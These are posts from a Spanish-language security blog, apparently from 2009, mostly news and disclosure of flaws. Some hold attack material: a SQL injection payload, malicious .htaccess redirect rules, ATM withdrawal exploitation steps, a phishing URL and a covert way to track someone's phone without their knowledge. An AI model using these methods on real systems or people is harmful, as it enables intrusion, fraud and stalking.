0

Si -- No

Localización y triangulación geográfica de un Movistar

ElPerro    Laboratorio, Movistar, Seguridad, Yo Consumidor

Es un sistema simple y extremadamente sencillo de utilizar. De hecho, si obtenemos acceso físico al celular que querramos rastrear, podemos habilitarlo para que siempre acepte las solicitudes de rastreo sin que su dueño lo sepa ya que la aplicación posee 4 opciones que permiten o deniegan esta solicitud que veremos en detalle.

¿Qué es?
* El servicio de Localización de Movistar, te permite saber dónde se encuentra otro Movistar. Cada equipo localizado puede administrar listas “blancas” y “negras”. Para permitir ser siempre localizado (blancas) o bloquear (negras) siempre su localización desde esos móviles.

¿Qué beneficios tiene?
* Podés conocer la ubicación de un movistar con sólo enviar un mensaje de texto.
* La utilización del servicio es rápida y sencilla.
* Podés optar si querés ser localizado o no.
* Elegir qué personas están autorizadas para conocer tu ubicación.

¿Cómo funciona?
* Para localizar un Movistar, tenés que enviar un mensaje de texto al número 36633 “DONDE” con el número de teléfono que querés localizar.
* En todos los casos, el número de movistar que querés localizar debe ser ingresado en 10 dígitos, es decir, sin 0 ni 15 (sólo cod. de área + Nro. Local). Ej.:1112345678.
* Al recibir la petición de localización, la aplicación le solicita autorización al equipo a localizar con el siguiente mensaje:
“El móvil XXX intenta conocer su ubicación. Conteste 1 para autorizar, 2 para cancelar, 3 para autorizar siempre, 4 para negar siempre la información.”
* Esta solicitud de autorización no sucede si el equipo a localizar agregó el Movistar localizador en alguna de sus listas. (blanca o negra)
* Cualquier respuesta que no contenga las opciones mencionadas es ignorada por la aplicación (igual que si no hubiese contestado).

¿Cómo realizo una localización?
* Para realizar una localización, tenés que enviar un mensaje de texto al 36633 con el número de Movistar que querés localizar. (Ej. 1112345678).
La aplicación, confirma al equipo localizador que procederá a ubicar al localizado.
* En el caso en que la localización sea exitosa, te confirma la misma al equipo localizador con el siguiente mensaje (a modo de ejemplo):
El móvil XXXXXXXXXX esta en un Radio: 0.19 Km.; desde ing. Butty 240, Ciudad de Buenos Aires, Ciudad de Buenos; Coordenadas (-58 22 15,-34 35 45)
* Si no hay respuesta de localización:
Luego de 3 minutos si no hay respuesta del movistar que querés localizar, la aplicación te informa que:
“No recibimos respuesta al pedido de autorización para localizar al móvil XXXXXXXXXX. Es posible que el móvil este ocupado en una llamada.”

¿Cómo gestiono mis listas blancas y negras?
La gestión de las listas se hace desde el movistar “localizado”, enviando un comando al número 36634 según te detallamos a continuación:

* Para agregar un contacto en tu LISTA BLANCA: tenés que enviar un mensaje de texto al 36634, con la palabra SIEMPRE (espacio) número de celular.
Ejemplo: Siempre 1112345678
* Para agregar un contacto en tu LISTA NEGRA: tenés que enviar un mensaje de texto al 36634, con la palabra NUNCA (espacio) número de celular.
Ejemplo: Nunca 1112345678
* Para borrar un contacto de tu lista y solicitarle siempre previa autorización cuando te pida localizarte: tenés que enviar un mensaje de texto al 36634, con la palabra BORRAR (espacio) número de movistar.
Ejemplo: Borrar 1112345678
* Para conocer si un celular se agregó en la lista blanca o negra: tenés que enviar un mensaje de texto al 36634, con la palabra ESTADO (espacio) número de movistar.
Ejemplo: Estado 1112345678
* Para limpiar las listas de contacto y dejar sin efecto las listas cargadas: Tenés que enviar un mensaje de texto (SMS) al 36634, con la palabra RESET.
Ejemplo: Reset

¿Cuánto cuesta?
* El precio de una localización si es exitosa es de $0,78.- más impuestos ($1 precio final).
* En el caso de que la localización no sea exitosa porque el movistar que querés localizar no responde, no autoriza o no tiene una simcard compatible (alguna otra empresa que no admita Movistar), sólo se cobra el 50% de la solicitud de la localización.
* Todos los mensajes de administración de listas “blancas y negras” son sin cargo.

Equipos Compatibles
* Compatible con todos los equipos GSM que puedan enviar mensajes de texto. Con la condición de que el equipo que querés localizar además de ser GSM debe tener una simcard compatible con el servicio (simcard blanca o azul que tenga la opción de descargas).

Tecnología
* Tecnología GSM.
Cobertura
* Todo el país.

Ahora el dilema moral que esto implica
Ya no es necesario contar con delicados y complejos dispositivos de alta tecnología de rastreo GPS en tiempo real. Solo un par de celulares y unos minutos a solas con el celular que querramos rastrear. Esto se logra con simple ingeniería social y una cuota extra de ingenio.

Cabe aclarar que este sistema es solo para usuarios de Movistar. A la fecha, no me consta que exista un servicio similar en otras empresas.
Si sabés de algún sistema equivalente para Claro o Personal, por favor, dejame tu comentario en esta nota.

GreetZ!

0

Si -- No

Candado Bluetooth para tu PC…

ElPerro    Descargas Varias, Seguridad

Si sos de esas personas ultra fanáticas de la seguridad y metés clave en Bios, arranque del sisOP y hasta en las carpetas, este es un programa que te va a venir como anillo al dedo ya que permite bloquear tu computadora para que solo sea accesible por medio de un dispositivo Bluetooth previamente identificado [celular, PDA u otra PC].

Este sofware bloquea automáticamente tu computadora y para activarlo tenés que acercar tu teléfono celular/PDA con Bluetooth activado. De este modo aunque pierdas o te roben tu laptop la información permanecerá bloqueada ante cualquier punga extraño. Este programa sólo necesita que se haga una vez la conexión con el celular que servirá de llave. Después cada vez que prendas la PC Blue Block se ejecuta directamente.

Blue Lock está no necesita claves de acceso ya que el software identifica el Bluetooth del celular. Además, cuando alguien intenta entrar simplemente parece que el sistema operativo está bloqueado. Protege también de cualquier intento de desactivación del software impidiendo al acceso al administrador de tareas. No es posible sortear el programa arrancando en modo a prueba de fallos. Por defecto funciona a través del sistema de contraseñas de Windows aunque puede configurarse para que se bloquee y desactive sin necesidad de introducir una clave adicional.

Ahora la pregunta del millón
Y si te roban el celular?

Podemos descargar Blue Lock desde la página web de su desarrollador.

0

Si -- No

Primer Parche de seguridad para Firefox 3.5

ElPerro    Novedades, Seguridad, Vulnes

Cuánto tiempo lleva Firefox 3.5 en las manos de miles de navegantes y ya hay un parche de seguridad? Bien, con esta nota me encontraba hace un par de horitas…Fresquita, fresquita.

Mozilla anunció el primer parche para su recién lanzado Firefox 3.5. Un parche que llegará en las próximas semanas para solucionar diversos agujeros de seguridad que no estaban resueltos en la versión final del navegador.

Firefox 3.5.1 será la primera actualización del recién estrenado Firefox 3.5 y está prevista su llegada para mediados o finales de julio. Esta actualización incluirá parches para, al menos, tres agujeros y “topcrashes”, el término que emplea Mozilla para describir errores frecuentes que hacen que se rompa la conexión a Internet cuando se utiliza el navegador. Como muchas aplicaciones, Firefox pregunta a los usuarios si quieren informar de estos incidentes cuando se producen.

“El objetivo de esta actualización será una mejora rápida de estos topcrashes y agujeros”, explica Mozilla.

Uno de estos incidentes frecuentes está relacionado con TraceMonkey, la nueva y más rápida tecnología de JavaScript que ha debutado con Firefox 3.5. Al menos uno de los agujeros fue solucionado una semana antes de que esta nueva versión del navegador estuviera oficialmente disponible.

Se calcula que se han descargado unas 6,5 millones de copias de Firefox 3.5 en las primeras 36 horas de vida de Firefox 3.5, según el contador en tiempo real que Mozilla ha habilitado. Un dato que contrasta con los 8,3 millones de descargas que consiguió Firefox 3.0 en sus primeras 24 horas de vida.

Fuente: IDG.es

GreetZ!

0

Si -- No

Como ver fotos de alguien en Facebook sin tener que agregarlo

ElPerro    Privado, Seguridad, Vulnes

Editado 24hs después
La bronca
Hace un rato uno de mis contactos me muestra que este truco es bastante conocido en el ambiente underground…Me quiero cortar las pelotas…
Este truco lo encontré por error tratando de hacer algunas aplicaciones para integrar mi blog a mi cuenta de Facebook al 100% en el área de fotografías con códigos “propios” sin usar las APP predefinidas…

Voy a ir directo al punto porque sino se me hace muy largo el post.

click para agrandar

Leer mas…

0

Si -- No

Cómo hackearon los Padrones Nacionales?

ElPerro    Mi Trabajo, Privado, Seguridad, Vulnes

Visto y considerando que nadie me dió ni tronco de pelota en algo tan delicado como el ataque al sitio web del Padrón Electoral Nacional, decidí volcarlo en este post.
Obviamente, solo accesible para unos pocos No quiero que todo el mundo ande haciéndose el hacker y terminemos por reventar un servicio tan útil como ha resultado este sitio web en las últimas semanas.
EDITADO: Ahora que arreglaron el bug, hago público el post

El ataque fué de lo mas simple
Ni siquiera son necesarios conocimientos previos de programación o seguridad web dado que el error recae en el almacenamiento de las cookies.

El programador dispuso al programa generar una cookie por el ingreso al sistema de consulta al que todos tenemos acceso simplemente con tipear http://www.padrones.gov.ar, esa cookie queda almacenada en nuestra computadora de la misma manera que miles y miles de cookies de los sitios web que navegamos.
Ahora bien…el fragmento de información [cookie] almacenado en nuestro disco rígido no es nada mas y nada menos que el nombre de usuario y clave de acceso al sistema de administración y es muy simple de ver con un simple editor de cookies o entrando a la carpeta donde se almacenan los archivos temporales de Internet.

Veamos que ocurre con Firefox

No hay mucho mas que decir verdad?
Solo resta buscar el directorio de administración.
Eso me llevó nada mas que unos pocos segundos, el directorio era “admin”.

Tiempo total desde el ingreso a la página hasta el acceso al sistema de administración: 5 minutos, 37 segundos [cornometrado con el celular]

Mas imágenes en Flickr

GreetZ!

0

Si -- No

Hacking a cuentas de Twitter…

ElPerro    Anecdotario, Seguridad

No se puede.
Solo es posible saturarlas o bloquearlas mediante password guessing lo cual la deja inhabilitada por un par de minutos hasta que el “dueño” la confirme mediante su cuenta de correo electrónico.
Fuera de eso es poco probable que puedas acceder.

A qué viene esto?
Hoy aparecieron dos cuentas, @jowicampobassi y @rodolfobarili son FAKES, ambas cuentas SON TOTALMENTE FALSAS y por ende, no las sigas…

Además, pobre Barili, apenas puede con su N95 y va a andar usando Twitter?!

GreetZ!

0

Si -- No

Consejos para evitar phishing…

ElPerro    Seguridad, Tutoriales, consejos

Nic.ar nos deja algunos consejitos para evitar los famosos “cazabobos” o como reza la jerga: “Phishing”, del inglés: pescando.

Descarga Formato PDF: Nic.ar

GreetZ!

0

Si -- No

Phishing de Banco Galicia…Malísimo…

ElPerro    Seguridad

Observen atentamente y por favor, no ingresen datos reales:

http://www.ajevenezuela.net/boletines/cn/www.e-galicia.com/portal/

Este sitio supone ser una web normal del Banco Galicia, sin embargo es un pobre phising pésimamente hecho…

En fin. Una para tener en cuenta.
Tengan cuidado y denuncien, denuncien!!!

Fuente: Fabio Baccaglioni

GreetZ!

EDITADO 23/06/2009: El intento de phishing fué sacado del server

0

Si -- No

Protegido: Como recuperar un dominio .ar?

ElPerro    Privado, Seguridad, Tutoriales, Vulnes

1

Si -- No

Análisis de seguridad web – SQL Injections

ElPerro    Anecdotario, Mi Trabajo, Seguridad, Vulnes

Hace un par de días vienen atacando la web La Ciudad Del Rock, sitio de Radio Estación K2 de la ciudad de Necochea.
El sitio fué atacado con una simple SQL Injection:

-1+union+select+1,user,3,pass,5+from+admin_usuario

Tomo conocimiento de este ataque gracias a este post en un foro que orgullosamente modero:
Post indivualizado: http://foro.latinohack.com/showpost.php?p=33380&postcount=42
Post General: http://foro.latinohack.com/showthread.php?t=8662&page=5

Si leés el post general, armate de paciencia para entender el lío que se armó.
Al ver el hackeo y dados los problemas que estaba teniendo con ese usuario Ziion2000, decido efectuar lo que en la jerga I.T. se denomina como contra-deface o contra-hackeo y que consiste en efectuar un ataque de similares características pero con una finalidad opuesta, es decir, reparar el daño causado.

La SQL Injection es una práctica común entre los Script Kiddies y es una de las mas populares entre los programadores a la hora de probar sus sistemas.
Aclaración: No considero que un Script Kiddie sea un lammer siempre y cuando utilice ese conocimiento [que no es poco] para bien.

Una solución simple para evitar las SQL Injection sería con un if tomando también que el valor de ID sea numérico y se hace un isset.
Como ejemplo tenemos el código vulnerable de la gente de LaCiudadDelRock.com.ar:

Expuesto a SQLInjection: $id = $_GET['id']; [Permite que la variable ID pueda tener CUALQUIER VALOR, lo que da pie a una posible SQL Injection]

Solución: $id = isset($_REQUEST['id']) ? (int)$_REQUEST['id'] : 0; [Verifica el valor de la variable ID, si este no es entero, le da valor de 0, lo que cancela cualquier dato que le hayamos ingresado]

Pero, qué significa esto que acabo de decir?
Significa que en el primer caso, un valor asignado podrá ser CUALQUIER COSA, es decir, dejará pasar las consultas del estilo: id=-1, id=-a, etc…
En cambio, en el segundo caso, podemos filtrar solo valores enteros, es decir: id=565 y NADA MAS
Esto se da en la mayoría de los casos en donde las variables son numéricas. En el caso de variables Alfanuméricas sería:
mysql_real_escape_string, y nos quedaría un filtro como este:

Solución: $id = isset($_GET['id']) ? mysql_real_escape_string($_GET['id']) : 0;

Este es un error en el que, por apuro o por simple vagancia [pereza], casi todos los programadores en PHP o ASP con bases SQL recaen.

Nota: Este post contó con la asesoría en programación del Señor Martín López

GreetZ!

0

Si -- No

XSS en CreaTuForo

ElPerro    Seguridad, Vulnes

Un Security Advisory de la mano de Andrés Contreras Guillen quien ya nos había enviado un muy buen material de aporte al blog. Esta vez, vamos con algo del mundo underground, un poquito de Hax00r Activities para arrancar el día.

Qué es Un XSS?

Segun la Wikipedia [que esta en lo cierto]
Su nombre original “Cross Site Scripting”, y renombrado XSS para que no sea confundido con las CSS, (hojas de estilo en cascada), originalmente abarcaba cualquier ataque que permitiera ejecutar código de “scripting”, como VBScript o JavaScript, en el contexto de otro dominio.

Recientemente se acostumbra a llamar a los ataques de XSS “HTML Injection”, sin embargo el término correcto es XSS. Estos errores se pueden encontrar en cualquier aplicación HTML, no se limita a sitios web, ya que puede haber aplicaciones locales vulnerables a XSS, o incluso el navegador web en sí. El problema está en que normalmente no se validan correctamente los datos de entrada que son usados en cierta aplicación. Esta vulnerabilidad puede estar presente de forma directa (también llamada persistente) o indirecta (también llamada reflejada). Cada una se trata de forma diferente.

Directa: este tipo de XSS es el que normalmente es censurado; así que es muy poco común que puedas usar tags como < script > o < iframe >
Indirecta: esta es un tipo de vulnerabilidad muy común y muy poco explotada. Consiste en modificar valores que la aplicación web utiliza para pasar variables entre dos páginas, sin usar sesiones.

Bug en Crea Tu Foro:

Se encuentra en el apartado de recomendar web ya que como ven al ejecutar el script alert muestra en poup con XSS como texto.
A esta vulnerabilidad se le puede sacar las cokies de el Panel de Administrador de la web y desfigurar el sitio completo o de algún usuario en particular.

Aviso del Bug Para ElPlog By Andres Contreras Guillen

0

Si -- No

Crackeo Wep con Backtrack 3 – Versión USB

ElPerro    GNU/Linux, Laboratorio, Seguridad, Videotutos

GNU/Linux Backtrack es una versión live ideal para efectuar análisis de seguridad y contraseguridad en redes WiFi con encriptación WEP.

Video Tutorial y descarga

Descarga

http://rapidshare.com/files/255145615/backtrack_3_live_usb.part01.rar

http://rapidshare.com/files/255146462/backtrack_3_live_usb.part02.rar

http://rapidshare.com/files/255146305/backtrack_3_live_usb.part03.rar

http://rapidshare.com/files/255146351/backtrack_3_live_usb.part04.rar

http://rapidshare.com/files/255146486/backtrack_3_live_usb.part05.rar

http://rapidshare.com/files/255146450/backtrack_3_live_usb.part06.rar

http://rapidshare.com/files/255146699/backtrack_3_live_usb.part07.rar

http://rapidshare.com/files/255146735/backtrack_3_live_usb.part08.rar

http://rapidshare.com/files/255146825/backtrack_3_live_usb.part09.rar

http://rapidshare.com/files/255146804/backtrack_3_live_usb.part10.rar

http://rapidshare.com/files/255146828/backtrack_3_live_usb.part11.rar

Descarga Tutorial: Manual de Uso
Fuente: Warexone
Clave de archivos .RAR: warexone.info
Clave de acceso a Backtrack
Usuario: root
Clave: toor

Aprendan y disfruten, pero no hagan cagadas porque esto les puede servir a ustedes algún día.

GreetZ!

0

Si -- No

Los falsos antivirus y el uso fraudulento del .htaccess de páginas legítimas

ElPerro    Seguridad

La industria antivirus “alternativa” está en pleno auge. Se trata de antivirus falsos (llamados “rogue”) que habitualmente se hacen pasar por una milagrosa cura para un sistema completamente infectado. Sus páginas parecen profesionales y engañan a los usuarios a través de una animación falsa donde supuestamente se detecta una gran cantidad de malware en el sistema y se propone la descarga del verdadero virus para desinfectar. Publicitar este tipo de “antivirus” es una tarea que se toman muy en serio.

Según Hispasec
Los antivirus “rogue” no son más que malware camuflado bajo el aspecto de un antivirus. Suelen diseñar una página de aspecto profesional desde donde puede descargarse. Para incitar a la instalación, simulan mediante una animación Flash que el sistema está siendo analizado en vivo y que se ha encontrado mucho malware que el falso antivirus puede eliminar. La animación suele ser la misma independientemente del sistema operativo que se utilice para visitar la web. Los creadores de este malware necesitan que se visite este tipo de páginas para que el usuario descargue y ejecute. Resulta una alternativa a la ejecución automática en la víctima aprovechando vulnerabilidades. Este sistema de ingeniería social cubre por ejemplo, la “cuota de mercado” que resta de usuarios que no pueden ser infectados a través de fallos de seguridad porque su sistema está al día.

Los dominios que alojan este tipo de malware se han multiplicado en el último año. Suelen tener el aspecto de: [ATENCIÓN, pueden contener malware, NO se deben visitar a menos que se sepa lo que se está haciendo].

antivirus-scanner-online .com, online-av-scan2008 .com, antivirus-online-08 .com, anti-virus-xp .com, anti-virus-xp .net, i-spyware8 .com, anti-spyware4 .com, smartantivirus2009v2 .com, smartantivirus2009v2-buy .com, anti-spyware11 .com, anti-spyware10 .com, antivirus-cs1 .com antivirus-cs14 .com, anti-virusxp2008 .net, antimalware09 .com, antivirxp .net, av-xp08 .net, av-xp2008 .com, av-xp2008 .net, avx08 .net, axp2008 .com, e-antiviruspro .com, online-security-systems .com, xpprotector .com, pvrantivirus .com, wav2008 .com, wiav2009 .com, win-av .com, windows-av .com, windowsav .com y un largo etcétera.

La técnica que se está observando últimamente es la del uso de banners y anuncios (Adsense, principalmente) para invitar al usuario a la descarga del supuesto antivirus a través de una publicidad que parece “normal”. Incluso invierten (probablemente usando tarjetas robadas) en anuncios en páginas legítimas. Ahora han ido un paso más allá usando el archivo .htaccess de servidores legítimos, que consiguen controlar bien robando sus credenciales o aprovechando fallos de seguridad del sitio.

.htaccess es un archivo de Apache que permite controlar el acceso al directorio web donde esté alojado. Permite bloquear el acceso por direcciones IP o por otras reglas. Una posibilidad es por ejemplo usar el REFERER, o “desde qué página se ha llegado” y poder redirigir al visitante en consecuencia gracias al RewriteEngine del servidor web.

Se han observado cambios como estos en los archivos .htaccess modificados en webs legítimas.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://webdelsupuestoantivirus.com [R,L]
Errordocument 404 http://webdelsupuestoantivirus.com

Lo que resulta curioso. Si un usuario visita directamente una página web con el .htaccess modificado de esta forma, en principio no pasará nada. Pero si la visita se realiza desde uno de los buscadores que aparecen (la víctima viene de Google, AOL, msn…), como el HTTP_REFERER cumple una de las condiciones de la expresión regular, será redirigido según la regla “RewriteRule” a la web del supuesto antivirus de forma automática. También si se visita una web que no exista (el servidor devuelve un 404).

Resulta especialmente rebuscado, pero al parecer eficaz. Los atacantes están aprovechando cada vez más las etiquetas User-Agent y Referer del protocolo HTTP para “personalizar” ataques. Si no son imprescindibles para el usuario, se puede añadir una pequeña capa de protección modificando estos valores través de un proxy. Por supuesto, además, conviene descargar y utilizar antivirus sólo de marcas reconocidas.

Fuente: Hispasec

0

Si -- No

Hackearían Taringa.net

ElPerro    Administracion, Seguridad

Recién hablaba con un par de peregiles, entre ellos el “famoso” [gracias a mi ] Knet y otro usuario a quien no voy a nombrar debido a algunos problemas legales…

El portal Taringa.net es un sitio ampliamente recurrido por diversos navegantes de brechas de edad muy amplias, es así que niños de 12 a 17 comparten el espacio en armonía con gente mucho mas grande…Bueh, el asunto es que los de Taringa, no me caen muy bien, sobre todo por los comentarios efectuados en contra de Alkon luego del ataque que sufrieran. Lo que me molesta es la actitud del tal Knet…La gente de Alkon y yo quedamos en excelente relación gracias a que al descubrir sus errores de seguridad y repararlos [la reparación la hizo el admin, no yo...] gané mucho mas que dinero o renombre, gané algunos amigos dentro del foro.
Sisi, ya se, es recontra cursi lo que dije pero es la verdad…

Mensaje a KNET
Dejate de joder nene, dedicate a reportar los errores y vas a crecer mucho mas. Podés aprender mucho de la gente de esos foros que defaceaste [repito, uno de ellos, Alkon, lo bajaste gracias a mi]. Gracias al reporte de esos errores gané la amistad del programador y administrador de Alkon y sinceramente, creo que puedo aprender muchas cosas de el y espero que vos estés pensando lo mismo pibe.

Lo voy a repetir hasta el cansancio porque te las diste de “Dios de la Red” y no tenés lo que realmente se necesita…un poquitito de ética…

Saludos!

NOTA RELACIONADA: El Hackeo a Alkon fué error Nuestro

0

Si -- No

Pena Capital para hackers en Pakistán…

ElPerro    Misceláneas, Seguridad

En un comunicado del presidente Asif Ali Zardari se indica que el ciberterrorismo será castigado con la pena capital.

El anuncio presidencial no está dirigido a spammers ni otros ciberdelincuentes de poca monta, sino a quienes ocasionen la muerte de terceros mediante actos de intrusión, sabotaje o terrorismo informático.

En el texto del decreto presidencial se indica que todos quienes incurran en ciberdelitos que ocasionen muertes serán castigados con la pena de muerte o presidio perpetuo.

El ciberterrorismo es descrito como el acto de intervenir una red o sistema y deliberadamente cometer terrorismo. A modo de ejemplo se menciona copiar o sustraer información sobre la fabricación de armas químicas, biológicas o nucleares.

En el mismo texto se menciona el marco punitivo aplicable a otros actos de delito informático, como por ejemplo intrusión, fraude electrónico, vandalismo o usurpación de identidad. Estos delitos serán sancionados con penas de 3 a 10 años de cárcel.

Pakistán destaca que la ley se aplicará a nacionales y extranjeros, ya sea se encuentren o no en el país al momento de cometer los delitos informáticos.

Fuente: DiarioTi

0

Si -- No

Vulnerabilidad en WPA…

ElPerro    Seguridad, Vulnes

La noticia ha saltado por los medios durante los últimos días: se ha roto la protección WPA. En muchos casos, el tono ha sido alarmista y parecía que tuviéramos que tirar ya nuestro router inalámbrico a la basura. Afortunadamente no es así.

Lo que se ha descubierto ha sido un método para descifrar parte del tráfico que va del router a los ordenadores, modificarlo y volverlo a enviar. Y aunque es una vulnerabilidad suficientemente seria como para tomarla en cuenta, de momento no invalida el uso de este protocolo ni de los dispositivos que lo implementan.

En soluciones anteriores, como el protocolo WEP se consiguió romperlo de una manera total. Mediante el análisis de tráfico se lograba obtener la clave usada para conectarse a la red, consiguiendo acceso como cualquier otro usuario.

En el caso de este ataque contra WPA, se ha encontrado una vulnerabilidad, la cual no permite acceder a la red inalámbrica, sino solo a algunos de los paquetes. De hecho, solo los que van desde el router al ordenador, pero no los que lo hacen en sentido contrario.

La vulnerabilidad ha sido encontrada en el protocolo TKIP pero no afecta en caso de que utilicemos AES para el cifrado, por lo cual si todos nuestros dispositivos lo soportan esta es de momento la mejor opción. Aunque si todos ellos soportan WPA2 podemos pasarnos a este protocolo, pero su uso todavía no está demasiado extendido.

En cualquier caso, usando WPA debemos tener en cuenta el escoger una clave suficientemente segura, con una buena longitud y mezclando caracteres. Mi recomendación es de, al menos, 10 carácteres, usando tanto letras en mayúsculas y minúsculas como cifras y signos de puntuación. Con ello evitaremos ataques de diccionario que consigan averiguar nuestra clave mediante múltiples pruebas de combinaciones.

Fuente: Xataka

0

Si -- No

Red Link y la re p…

ElPerro    Mi Trabajo, Seguridad, Vulnes

Bueh!…Como si fuera poco…ahora los sistemas de Red Link poseen OTRO error producto a intentar reparar el reportado hace unos cuantos meses atrás y que publiqué hace unos días…Paso a detallar.

Antes, como había explicado en un post anterior, podías literalmente robarle al banco debido a un error ya subsanado por Red Link…Ahora es el banco el que te roba [No, si estos no pierden una!!!].

El Error
Es mucho mas simple que el anterior: Cuando ingresás los datos de la suma que quieras extraer de tu cuenta bancaria, el sistema corrobora tu saldo, al hacerlo, el sistema autoriza la entrega del dinero…PERO!!!…no corrobora CUANDO DINERO HAY EN EL CAJERO, entonces descuenta el monto de tu cuenta bancaria antes de descontarlo del monto del cajero, entonces es donde viene el problema porque cuando quiera entregarte la suma monetaria, simplemente arrojará un mensaje de error diciendo “La operación no puede realizarse, límite disponible $xxx,xx” y cuando hagas una consulta de saldo verás que el dinero, pese a que el cajero automático no te lo entregó, te fué descontado de tu cuenta.

Una de cal y una de arena
En otras palabras, el dinero se descuenta de tu cuenta bancaria sin que te lo entregue y eso es gracias a que al querer reparar el error anterior lo hicieron mal…muy mal…

Ya fué reportado por ENÉSIMA VEZ [mas por el hecho de que yo mismo lo sufrí ] Veremos que pasa esta vez.

Saludos!

0

Si -- No

Errores en cajeros ATM de Red Link

ElPerro    Mi Trabajo, Seguridad, Vulnes

Hace poco menos de seis meses vengo rastreando un error en los cajeros automáticos de la Red Link en Argentina.
Esperé a que pasara un tiempo prudente para reportarlo debido a que no sabía si el dinero que extraje de mas de mi cuenta, me sería descontado en los próximos depósitos…Paso a detallar…

Los cajeros automáticos cuentan con un límite finito de dinero, eso lo sabemos todos, es decir, si en el cajero hay $100 y vos querés extraer $110, no vas a poder, simplemente porque la terminal no posee los fondos para brindártelos.

Desarrollo
Si uno intenta extraer mas dinero del que posee el cajero, el sistema devolverá una pantalla de error diciendo: “Límite disponible: $xxx,xx” siempre en números redondos, es decir, nada de “$40,50″ o “$45,00″ ya que el sistema operativo de la unidad está programado solo para brindar sumas múltiplos de 10 y no inferiores a $10 argentinos.

La falla
La misma reside en la cadena que chequea la cantidad de dinero de la cuenta solicitante y la cantidad de dinero dentro del cajero automático. En otras palabras, en lugar de chequear cuanta plata hay en tu cuenta, chequea cuanto dinero posee el cajero automático.

Red Link o el banco operante dispone de un límite de extracción predeterminado de $1000,00 por día, en otras palabras, no podemos extraer mas de esa suma de nuestra cuenta a menos que ampliemos dicho límite. Si nuestro límite de extracción es de $3000,00, queremos extraer $2500,00 y el cajero solo cuenta con $1000,00 es donde aparece la falla, es como la descubrí y es donde aparece el siguiente método de explotación.

Explotación
Al ingresar a un cajero muy concurrido, el mayor miedo de todo cliente es que el mismo no posea dinero en ese momento y entonces comienza a extraer en pequeñas sumas de su cuenta para no tener que repetir la operación por sumas menores hasta que de con la que el cajero puede brindarle.

Si el cajero fué concurrido durante todo el día, es probable que no haya muchos fondos en el mismo, entonces nos dirgimos a él y solicitamos un monto superior al que podría tener:

Suponiendo que tenemos $15000,00 en nuestra cuenta.
1 – Solicitamos un importe muy grande [$9000,00]
2 – El cajero nos devuelve el siguiente mensaje: “No es posible realizar la operación – Límite disponible: $8000″
3 – Asumiendo que nuestro límite de extracción es de $3000,00 por día, solicitamos esa suma. El cajero nos brinda el dinero.
4 – Consultamos el saldo que nos queda disponible [deberían ser $12000,00. Es decir, lo que reste de la suma que teníamos originalmente] y nos devolverá el siguiente resultado:

SU SALDO: (S.E.U.O.) $ 15000,00
DINERO DISPONIBLE $ 3000,00 [este es nuestro límite de extracción por día]
EXTRACCIONES DISP. 3 [esta es la cantidad de veces que podemos sacar dinero sin exceder nuestro límite diario de extracciones]
DISPONIBLE PAGOS LINK $15000,00
DISP. CPRA. EN COMERCIOS $15000,00

El dinero extraído no me lo descontó de mi cuenta??!! No…simplemente el cajero, tomó el dinero de su propio límite monetario, no del límite de la cuenta.

Dejé pasar casi seis meses para reportar el error debido a que, si bien podía sacar dinero sin que me lo quite de mi cuenta, no sabía si luego el reporte de registros del cajero me “acusaría” y me lo descontarían de los próximos depósitos…Lo cual NUNCA OCURRIÓ.

Luego de reportar el error, devolví el dinero al banco y hoy por hoy, se encuentra subsanado así que, ni intenten explotarlo nuevamente porque ya no es válido.

[Un dato extra: Las extracciones no quedaban registradas, era como si el dinero simplemente se evaporara]

Saludos!!!